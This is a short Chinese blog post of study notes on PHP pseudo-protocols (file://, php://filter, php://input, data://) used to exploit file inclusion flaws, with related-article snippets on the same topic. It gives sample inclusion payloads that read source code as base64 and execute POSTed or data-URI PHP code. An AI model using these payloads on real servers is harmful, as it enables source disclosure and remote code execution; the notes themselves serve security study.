PHP代码审计 ----- 伪协议

最新推荐文章于 2024-05-14 21:12:14 发布
最新推荐文章于 2024-05-14 21:12:14 发布
阅读量407 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62344745/article/details/130410294
版权

php伪协议 --- file伪协议

        用于访问本地系统            不受  php.ini里的影响

allow_url_fopen   = off/on

allow_url_include: off /on

这两个开不开都行

file = file://E:\XXX\1.txt        绝对路径

读取1.txt文件,当作代码执行?

php://filter  伪协议

        php://filter 读取源代码并进行base64编码输出

file=php://filter/read=convert.base64-encode/resource=./1.txt

读取1.txt内容,并base64加密后显示

php://input

        php://input 可以访问请求的原始数据的只读流

        allow_url_include = on  必须开启

?file=php://input

然后用post方式传参        当作php代码执行 <?php phpinfo(); ?>

写入一个文件

        <?php fputs(fopen("1.txt","w"),'1234');?>

data://  协议

        allow_url fopen=on

         allow url include=on

?file = data://text/plain,<?php phpinfo();?>

也可以用base64

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=        不用带;分号结尾 ???

这两种都可以

故事结尾117
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3623
一些比较常用的php伪协议用法及部分演示过程
PHP伪协议
qq_62604985的博客
07-10 1165
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1068
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
php伪协议
weixin_60719780的博客
01-27 4463
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
File Inclusion(文件包含漏洞)学习 / 伪协议
Goodric的博客
01-25 2373
file inclusion(文件包含漏洞) 在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 通过文件包含函数将文件包含进来,直接使用包含文件中的代码。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但有些时候,使用函数包含文件时,被包含的文件就设置为了函数的变量。 通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。 通常文件包含
PHP-code-audit代码审计源码
01-02
php code audit for cms vulnerabilities / 代码审计,对一些大型cms漏洞的复现研究,更新源码和漏洞exp
rips-NDSS14.pdf
11-18
rips-NDSS14
PHP伪协议相关 -.pdf
02-24
php伪协议
php-7.3.10.tar.gz
07-23
总结:`php-7.3.10.tar.gz`是一个包含PHP 7.3.10源代码的压缩包,用于在Linux系统中搭建LNMP架构。通过解压、编译、安装和配置,我们可以利用这个压缩包构建出一个高效稳定的PHP运行环境,为Web应用开发提供强大的...
php xml-rpc远程调用
10-30
从网上找来的XML-RPC库,对于开发小型的外部通讯接口很有用,把这个代码保存为xml-rpc.inc.php
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9533
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
[php知识点]PHP伪协议
Landasika的博客
05-17 8154
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfilefile_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
PHP伪协议详解
m0_67401228的博客
08-02 1388
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
详解php://filter,伪协议的浅知识点
m0_75178803的博客
04-09 420
通过file协议可以访问本地文件系统,读取到文件的内容可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取通过 include 或 require 语句,可将 PHP 文件内容插入另一个 PHP 文件(在服务器执行它之前)。include 和 require 语句相同,但在错误处理方面:require 会生成致命错误,并停止脚本include 只生成警告,并且脚本会继续。
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9200
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
pikachu漏洞平台学习笔记6_File Inclusion
qq_38933307的博客
04-01 252
1.概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没
base64 转文件_PHP伪协议与文件包含
weixin_40003780的博客
11-27 1313
PHP伪协议与文件包含PHP伪协议与文件包含php:// 协议php://inputphp://filterdata:// 协议file:// 协议zip://、bzip2://、zlib://协议zip://协议bzip2://协议zlib://协议phar://伪协议文件包含漏洞(File Inclusion)文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器...
PHP代码审计-php-hash比较缺陷
07-08
嗨!对于PHP代码审计中的php-hash比较缺陷,我可以给你一些相关的信息。在PHP中,使用"=="操作符进行字符串比较时,存在一些问题。这是因为"=="操作符在比较字符串时会进行类型转换,可能导致意外的结果。具体来说,当比较两个字符串时,如果其中一个字符串可以被解释为数字,则会将字符串转换为数字进行比较。 例如,考虑以下代码片段: ```php $hash = "0e12345"; $input = "abc"; if($hash == $input){ echo "Equal"; } else { echo "Not equal"; } ``` 在这个例子中,$hash是一个以"0e"开头的字符串,它会被解释为科学计数法表示的数字。当使用"=="进行比较时,PHP会将$hash转换为数字0,因为科学计数法表示的0e12345等于0。因此,即使$hash和$input不相等,上述代码也会输出"Equal"。 为了避免这种类型转换带来的问题,在PHP中进行字符串比较时,建议使用"==="操作符,它会进行严格的类型和值比较。修改上述代码如下: ```php $hash = "0e12345"; $input = "abc"; if($hash === $input){ echo "Equal"; } else { echo "Not equal"; } ``` 使用"==="操作符进行比较时,$hash和$input的类型

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值